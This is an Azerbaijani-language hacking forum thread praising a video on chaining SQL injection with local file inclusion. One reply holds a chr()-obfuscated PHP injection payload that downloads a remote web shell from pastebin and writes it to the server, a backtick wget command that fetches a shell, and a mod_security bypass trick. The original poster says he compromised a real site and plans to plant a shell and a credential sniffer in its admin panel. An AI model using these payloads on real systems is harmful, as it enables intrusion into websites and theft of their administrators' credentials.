Anti-armenia.ORG - Forumlar - Sql İnjection və LFİ



Istifadəçi
    2012-12-19 19:36 GMT                 

Sexavet



Creative
Mesaj Sayı : 199
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   16  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 29
Mesaj :

Mövzunu Paylaş!


Sql İnjection və LFİ açıqlarının sinerjisi ))) Yeni başlayanlar üçün gərəkli ola bilər...


Anti-armenia.ORG
    

Istifadəçi
    2012-12-19 22:28 GMT                 

AzSecurity



Gold
Mesaj Sayı : 122
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   5  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : Linux sys admin
Yaş :
Mesaj :

Mövzunu Paylaş!


Halaldı Sexavet.Mənə lazım deyil(sahəm olmadığı üçün)ama maraqlı gəldi axıra qədər baxdım.Gözəl paylaşımdır

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2012-12-19 23:54 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Qəşəng bro + Respect))

include səndə getdi çünki allow_url_include =On idi.
Əksər serverlərdə yuxarıdakı php.ini direktivi OFF olur.
Yəni remote heçnə include edə bilməzsən.
Elə hallarda default allow_url_fopen() vasitəsilə shelli dolayı yaza bilərsən.

http://pastebin.com/VmJV9QNX

Kod:
mod=&word=${@var_dump(file_put_contents(chr(117).chr(112).chr(108).chr(111).chr(97).chr(100).chr(115).chr(47).chr(49).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(112).chr(97).chr(115).chr(116).chr(101).chr(98).chr(105).chr(110).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(46).chr(112).chr(104).chr(112).chr(63).chr(105).chr(61).chr(78).chr(122).chr(120).chr(78).chr(121).chr(54).chr(122).chr(119))))}




süzmək olur remote shelli.

Daha sonra fikir verdim system() funksiyasına da özünü cırırdı mod_security.
Onu başqa cürə də bypass etmək olar ən sadə yolu backtick vasitəsilə yəni `wget http://shell.shell/shell.txt -o shell.php`;
system() -in eynisidir.(disable edilməyibsə yaxud safe_mode =On deyilsə)


Vasitəsilə.

mod_security xüsusilə hostgatorda adamın beynini xarab edir.
Bu da bir bypass yolu verim lazım olar kiməsə:
http://pastebin.com/vPq7HVbW


Qısacası bypass yolu /*!40101 */ və %0d%0a%0d%0a <=CRLF injectionla birgə.

+ Bro çalış bu kimi attacklarda mütləq birinci phpinfo() -nu alasan.
+Fikir verdim short open tag istifadə edirsən.Aldada bilər səni.
Çalış <?php phpinfo();?>
PHP tagları aç həmişə.
Onu alanda sistem haqqında həddindən artıq çox məlumata sahib olmuş olursan.Bilirsənki nə disabledir nə isə enable.O halda daha asan vurub çıxmaq olur.


+Heç vaxt inanmakı google-da tapılmayan MD5 deməli qırılmayıb.
Mütləq həmişə 1-ci növbədə md5decrypter.co.uk -da yoxla.

Video Super Əməyə Hörmət +Respect )

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2012-12-20 08:49 GMT                 

Sexavet



Creative
Mesaj Sayı : 199
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   16  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 29
Mesaj :

Mövzunu Paylaş!


Vaxtınızı ayırıb izlədiyiniz üçün təşəkkürlər
Həə Bro, php-idirsə burda varyantlar çoxdu ee )) nəmm, aqlıma ilk gələnlərdəndə biri include oldu oda girdi elə )))
+ phpinfo()-da da Forbidden idi... Ona görə videonu çəkəndə birbaşa die()-dən başladım ))
hə bro yazdıqın bypass üsulu da əla üsuldu, təşəkkürlər...
+ bu saytı əvvəldən vurmuşdum, onda hashları chox decrypter saytdarında yoxlamışdım, prostu videoda qoyduqum mövzu təkcə sql inj. deyildi deyə uzatmadım, durub bir-bir o saytdarda yoxlamadım )))
+ admini saytı bərpa eləsin təzədən shell soxub admin panelinə sniff soxacam, o md5-ləri də qıraq, bəlkə gələcəkdə email yada başqa yerlərdə ehtiyacımız olar...

Bir daha təşəkkürlər )))

Anti-armenia.ORG
    

Istifadəçi
    2012-12-20 09:01 GMT                 

Lider



Banned
Mesaj Sayı : 11
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Good Job ))

Anti-armenia.ORG
    

Istifadəçi
    2012-12-20 11:09 GMT                 

Frozen



İstifadəçi
Mesaj Sayı : 135
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Respect+

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2012-12-25 02:02 GMT                 

Türkiye



İstifadəçi
Mesaj Sayı : 18
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


sağolasın güzel.

Anti-armenia.ORG
    

Istifadəçi
    2013-02-09 18:32 GMT                 

Baypars



VIP
Mesaj Sayı : 30
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : Baypars
Yaş : 33
Mesaj :

Mövzunu Paylaş!


LFI hafife alınsa da açık hala mevcut

Anti-armenia.ORG
    

Istifadəçi
    2013-02-09 18:54 GMT                 

Error_007



Gold
Mesaj Sayı : 222
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : -
Ölkə :
Məslək :
Yaş : 35
Mesaj :

Mövzunu Paylaş!


Təşəkkür,Əllarivə Sağliğ!

Anti-armenia.ORG
    

Istifadəçi
    2013-02-09 18:56 GMT                 

Sexavet



Creative
Mesaj Sayı : 199
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   16  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 29
Mesaj :

Mövzunu Paylaş!


İzləyib dəyər verdiyiniz üçün çox saqolun.

Anti-armenia.ORG
    

Istifadəçi
    2013-02-09 19:36 GMT                 

M4NY3T!K



Gold
Mesaj Sayı : 606
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   7  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Naxçıvan
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Həmişəki Kimi +Respect

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2013-02-10 09:54 GMT                 

BeBeTo



VIP
Mesaj Sayı : 178
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Bakı
Ölkə :
Məslək : Web Hack/Security/Web Analiz After Effect/
Yaş : 30
Mesaj :

Mövzunu Paylaş!


Çox sağ ol mütləq lazım olacağ ;)

Anti-armenia.ORG
    

Istifadəçi
    2013-04-28 08:28 GMT                 

Y3R4Z



İstifadəçi
Mesaj Sayı : 32
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


ömrümdə belə super videodərslik görməmişdim))əladı.təşəkkür.
bir də bir söz soruşum.Saytın adını yazacağın yerin aşağısında balaca yer var o deyəsən mozilla üçün addonsdu.onun adı nədi?bir də Tamper Popup var onu necə edim?

Axrıncı sualım.O saytın adının axrına kodlar yazırdın hamsını da əzbər bilirsən.bunu hardan öyrənmək olar?elə kitab varsa inboxa göndər də zəhmət olmasa))
Videoa görə bir daha təşəkkür.Super idi

Anti-armenia.ORG
    

Istifadəçi
    2013-04-28 08:48 GMT                 

Sexavet



Creative
Mesaj Sayı : 199
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   16  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 29
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər hər birinizə.

Y3R4Z,
HackBar : https://addons.mozilla.org/ru/firefox/addon/hackbar/
Tamper Data İcon : https://addons.mozilla.org/ru/firefox/addon/tamper-data-icon/

O kodları əzbər bilməy üçün az-çox mysql və php dillərini bilməlisən. Googledə axtarsan yetərincə dərsliklər tapa bilərsən, həmçinin bizim forumdada az deyil dərsliklər.

Anti-armenia.ORG
    

Istifadəçi
    2013-04-28 08:51 GMT                 

Y3R4Z



İstifadəçi
Mesaj Sayı : 32
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


php az-çox bilirəm ama mysql hələ yox))indi saytda axtararam qardaş çox sağ ol

Anti-armenia.ORG
    

Istifadəçi
    2013-04-28 09:00 GMT                 

Sexavet



Creative
Mesaj Sayı : 199
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   16  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 29
Mesaj :

Mövzunu Paylaş!


Uğurlar )

Anti-armenia.ORG
    

Istifadəçi
    2013-11-05 18:11 GMT                 

Mr.Avara



İstifadəçi
Mesaj Sayı : 13
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : baku
Ölkə :
Məslək :
Yaş : 34
Mesaj :

Mövzunu Paylaş!


Təşəkkür

Anti-armenia.ORG